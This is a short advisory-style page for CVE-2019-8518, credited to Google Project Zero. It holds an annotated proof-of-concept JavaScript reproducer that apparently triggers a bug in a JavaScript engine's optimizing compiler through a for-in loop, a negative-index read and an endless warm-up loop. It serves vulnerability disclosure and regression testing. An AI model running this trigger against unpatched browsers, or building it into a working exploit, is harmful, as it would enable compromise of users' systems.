
CVE-2019-8518.md


CVE-2019-8518

  • Report: Feb 2019
  • Fix: Mar 2019
  • Credit: Samuel Gross, Google Project Zero

PoC

// Run with --thresholdForFTLOptimizeAfterWarmUp=1000
// NOTE(review): judging by its name, this option lowers the warm-up count needed
// before the FTL tier compiles a function — confirm against the engine's option list.

// First array probably required to avoid COW backing storage or so...
// v3 is never referenced again in this listing; per the author's note above it is
// kept only for its allocation side effect (the author's guess, not confirmed here).
const v3 = [1337,1337,1337,1337];
// v6 is the two-element array that the driver loop passes to v7.
const v6 = [1337,1337];

/**
 * Reproducer body: for each enumerable key of v8, set a named property on v8
 * and then read a large negative key from the same object.
 *
 * The loop variable v9 and the read result v10 are never consulted, and the
 * function has no return statement, so it returns undefined.
 *
 * @param {*} v8 - value to enumerate; the driver passes an array and a number.
 */
function v7(v8) {
    // for-in visits enumerable property keys; a number primitive has none, so
    // the body is skipped entirely for the v7(1337) call.
    for (let v9 in v8) {
        // Adds (first pass) or overwrites the named property "a" on v8 inside the loop.
        v8.a = 42;
        // -698666199 is not a valid array index, so by language semantics this is an
        // ordinary property lookup that yields undefined on the two-element array.
        // NOTE(review): presumably this is the access the optimizing tier mishandles —
        // the page does not say; confirm against the vendor advisory.
        const v10 = v8[-698666199];
    }
}

// Driver: calls v7 forever, alternating an array argument with a number argument.
// NOTE(review): presumably the repetition is what warms v7 up to the threshold given
// in the run flag — confirm.
// There is no exit condition, so on an engine that handles this code correctly the
// script never terminates; use an external timeout when running it as a regression test.
// The page does not describe the failure symptom on an affected build.
while (true) {
    // v7 returns undefined, so v14 and v15 are unused placeholders.
    const v14 = v7(v6);
    const v15 = v7(1337);
}

Reference